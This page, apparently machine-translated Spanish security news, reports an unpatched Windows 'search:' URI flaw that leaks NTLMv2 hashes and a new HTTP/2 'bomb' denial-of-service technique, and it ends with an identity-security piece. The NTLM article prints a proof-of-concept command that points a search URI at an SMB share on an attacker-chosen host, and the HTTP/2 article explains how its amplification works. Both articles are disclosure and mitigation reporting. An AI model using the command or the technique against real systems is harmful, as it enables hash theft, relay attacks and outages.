  1. Forme un grupo de trabajo interdisciplinario: Alinee las operaciones de TI, los propietarios de aplicaciones, los propietarios de IAM y GRC para acabar con los silos técnicos.
  2. Realice un análisis de brechas cuantificado por riesgo: Comience con las identidades de las máquinas, ya que a menudo representan el mayor riesgo y la menor visibilidad.
  3. Implementar corrección sin código: Cerrar la desviación de postura (por ejemplo, suspender cuentas huérfanas, complejidad de contraseñas débiles) automáticamente a medida que se descubre.
  4. Aproveche la visibilidad unificada para eventos de alto riesgo: Utilice la telemetría IVIP durante fusiones y adquisiciones o eventos de crecimiento para auditar la postura de identidad de los activos adquiridos antes de que se integren en la red principal.
  5. Auditoría de Riesgo Empresarial: Utilice visibilidad continua para detectar infracciones a nivel de aplicación que las herramientas tradicionales pasan por alto.

Declaración final La visibilidad unificada ya no es una característica secundaria; es el plano de control esencial. Las organizaciones deben ir más allá de la «puerta de entrada cerrada» e implementar la observabilidad de la identidad para gobernar la materia oscura donde se esconden los atacantes modernos.

Nota: Este artículo fue escrito y contribuido por Roy Katmordirector ejecutivo de Seguridad de orquídeas.

¿Encontró interesante este artículo? Este artículo es una contribución de uno de nuestros valiosos socios. Síguenos en noticias de google, Gorjeo y LinkedIn para leer más contenido exclusivo que publicamos.

Una vulnerabilidad de URI de búsqueda de Windows sin parches permite a los atacantes robar hashes NTLMv2 – CYBERDEFENSA.MX

Investigadores de ciberseguridad han revelado detalles de un problema sin parchear que podría explotarse para revelar el hash NTLMv2 de un usuario al atacante.

Como en el caso de CVE-2026-33829que afectó al controlador ms-screensketch: URI de la herramienta de recorte de Windows, el problema recién señalado reside en la búsqueda: controlador URI, según Cazadora.

CVE-2026-33829 hace referencia a una vulnerabilidad de suplantación de identidad que podría exponer información confidencial a un actor no autorizado. Microsoft lo parchó en abril de 2026.

«Un atacante podría inducir al usuario a hacer clic en un enlace especialmente diseñado en un navegador web u otra fuente URL, incrustándolo en una página web o mensaje de correo electrónico», señaló Microsoft en su aviso en ese momento.

«Si el usuario aprueba el lanzamiento del enlace, la URL diseñada puede inducir a la computadora a conectarse a un servidor SMB elegido por el atacante, lo que revelaría el hash NTLMv2 del usuario al atacante, quien podría usarlo para autenticarse como usuario».

Ciberseguridad

Específicamente, el problema tenía que ver con el hecho de que el controlador de URI de la herramienta de recorte aceptó un parámetro «filePath», no pudo validarlo y llegaría a cualquier ruta de la Convención de nomenclatura universal (UNC) que se le pasara. Esto, a su vez, podría activar la autenticación NTLM y exponer el hash Net-NTLMv2 de la víctima al atacante.

La deficiencia recién descubierta logra el mismo objetivo final usando «buscar:» y «crumb=ubicación:» en lugar de «filePath» usando un comando como el siguiente:

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

«Utilizó el mismo mecanismo de fuga NTLM, produjo la misma fuga Net-NTLMv2, tenía los mismos requisitos previos y tenía la misma calificación Moderada», dijo el investigador de Huntress, Andrew Schwartz. Vale la pena señalar que el uso de un parámetro «crumb» para robar el hash (CVE-2023-35636) era documentado por Varonis en febrero de 2024.

Como resultado, un actor de amenazas podría aprovechar el hash capturado para realizar ataques de retransmisión y obtener un acceso más profundo a una red. Tras la divulgación responsable el 15 de abril de 2026, Microsoft se negó a abordar el problema y afirmó que «solo los casos de gravedad importantes y críticos cumplen con nuestro estándar de servicio».

En ausencia de una solución, se recomienda bloquear SMB saliente (TCP/445 y TCP/139) en hosts que no lo necesitan, aplicar la firma SMB para que los hashes capturados no puedan transmitirse a servicios internos y deshabilitar NTLM cuando corresponda.

La nueva vulnerabilidad de bomba HTTP/2 permite DoS remoto en NGINX, Apache, IIS, Envoy y Cloudflare

Los investigadores de ciberseguridad han descubierto un exploit de denegación de servicio remoto que afecta a los principales servidores web, incluidos NGINX, Apache HTTPD, Microsoft IIS, Envoy y Cloudflare Pingora.

La vulnerabilidad ha sido nombrada en código. Bomba HTTP/2 por California.

«El comportamiento vulnerable existe en la configuración HTTP/2 predeterminada de cada servidor», dijo la compañía, y agregó que fue descubierto por OpenAI Codex encadenando dos técnicas conocidas: una bomba de compresión y una retención estilo Slowloris.

«La bomba apunta a HPACK, el esquema de compresión de encabezados de HTTP/2: un byte en el cable se convierte en una asignación de encabezado completa en el servidor, que se repite miles de veces por solicitud», agregó Calif. «La retención es una ventana de control de flujo de cero bytes que evita que el servidor libere nada».

Ciberseguridad

HPACK es un algoritmo de compresión de encabezados dedicado para HTTP/2 que se utiliza para comprimir metadatos de solicitudes y respuestas utilizando la codificación Huffman que da como resultado una reducción promedio del 30 % en el tamaño del encabezado. También está diseñado para ser resistente a ataques como DELITO (abreviatura de «Compression Ratio Info-leak Made Easy») que puede filtrar cookies de autenticación de encabezados comprimidos.

Slowloris, por otro lado, es un tipo de ataque de denegación de servicio (DoS) que permite a un actor de amenazas abrumar un servidor objetivo abriendo y manteniendo muchas conexiones HTTP simultáneas entre el atacante y el objetivo. Es un ataque a la capa de aplicación.

HTTP/2 Bomb está inspirado en varios enfoques conocidos como HPACK Bomb (también conocido como CVE-2016-6581), que se reveló por primera vez en 2016, así como CVE-2025-53020una vulnerabilidad de agotamiento de la memoria en la implementación HTTP/2 de Apache httpd y dos fallas DoS en el servidor Apache HTTP a través de marcos de CONTINUACIÓN diseñados (CVE-2016-8740) y hambre de hilo de trabajo (CVE-2016-1546) en una conexión HTTP/2.

«Lo nuevo aquí es de dónde viene la amplificación», dijo Calif. «La bomba clásica introduce un valor grande en la tabla y hace referencia a él repetidamente, por lo que los servidores aprendieron a limitar el tamaño total del encabezado decodificado. Nuestra variante va en sentido contrario: el encabezado está casi vacío y la amplificación proviene de la contabilidad por entrada que el servidor asigna a su alrededor. El límite de tamaño decodificado nunca se activa porque no hay casi nada que decodificar».

En un escenario de ataque hipotético, una computadora doméstica con una conexión de 100 Mbps tiene el potencial de hacer que un servidor vulnerable sea inaccesible en cuestión de segundos. Es más, un solo cliente puede consumir y retener 32 GB de memoria del servidor contra Apache HTTPD y Envoy en aproximadamente 20 segundos.

Ciberseguridad

Para contrarrestar la vulnerabilidad, se recomienda aplicar las siguientes mitigaciones:

  • NGINX: actualice a 1.29.8+, que agrega la directiva max_headers con un valor predeterminado de 1000. Si la actualización no es una opción, se recomienda deshabilitar HTTP/2 con http2 desactivado.
  • Apache HTTPD – Corregido en mod_http2 v2.0.41. Si la actualización no es una opción, se recomienda configurar los protocolos http/1.1 para deshabilitar HTTP/2.
  • Microsoft IIS, Envoy y Cloudflare Pingora: no hay ningún parche disponible al momento de escribir este artículo.

«El error más profundo es que las especificaciones enmarcan el riesgo de memoria puramente como una relación de amplificación, y la relación es sólo la mitad de la ecuación», dijo Calif. «Un amplificador 70:1 es inofensivo si la memoria se libera cuando se completa la solicitud. Se convierte en un ataque porque HTTP/2 permite al cliente mantener la conexión abierta casi de forma gratuita, fijando cada byte asignado durante el tiempo que desee».